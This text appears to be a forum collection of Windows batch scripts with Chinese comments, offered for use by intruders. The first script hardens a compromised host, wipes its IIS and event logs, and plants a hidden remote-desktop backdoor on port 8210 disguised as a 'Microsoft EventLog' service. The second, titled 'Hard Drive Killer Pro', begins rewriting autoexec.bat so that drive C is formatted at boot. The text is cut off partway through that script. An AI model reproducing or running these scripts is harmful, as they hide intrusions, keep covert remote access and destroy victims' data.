@echo Windows Registry Editor Version 5.00 >patch.dll
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//lanmanserver//parameters] >>patch.dll
@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll
@REM [禁止共享]
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Lsa] >>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [禁止匿名登录]
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//NetBT//Parameters] >>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [禁止及文件访问和打印共享]
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//@REMoteRegistry] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//Schedule] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [禁止登录前关机]
@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [禁止显示前一个登录用户名称]
@regedit /s patch.dll
------------------------ cut here then save as .bat or .cmd file ---------------------------
下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。
@regedit /s patch.dll
@net stop w3svc
@net stop event log
@del c://winnt//system32//logfiles//w3svc1//*.* /f /q
@del c://winnt//system32//logfiles//w3svc2//*.* /f /q
@del c://winnt//system32//config//*.event /f /q
@del c://winnt//system32dtclog//*.* /f /q
@del c://winnt//*.txt /f /q
@del c://winnt//*.log /f /q
@net start w3svc
@net start event log
@rem [删除日志]
@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@del patch.dll
@echo The server has been patched,Have fun.
@del patch.bat
@REM [禁止一些危险的服务。]
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//WinStations//RDP-Tcp] >>patch.dll
@echo "PortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//Wds//rdpwd//Tds//tcp >>patch.dll
@echo "PortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//TermDD] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//SecuService] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,// >>patch.dll
@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,// >>patch.dll
@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Description"="Keep record of the program and windows message。" >>patch.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//termservice] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c://winnt//system32//termsrv.exe c://winnt//system32//eventlog.exe
@REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路]
3.Hard Drive Killer Pro Version 4.0(玩批处理到这个水平真的不容易了。)
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo off
rem This program is dedecated to a very special person that does not want to be named.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c://autoexec.bat >nul
echo @echo off >c://autoexec.bat
echo call format c: /q /u /autoSample >nul >>c://autoexec.bat
call attrib +r +h c://autoexec.bat >nul
rem Drive checking and assigning the valid drives to the drive variable.
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
管理
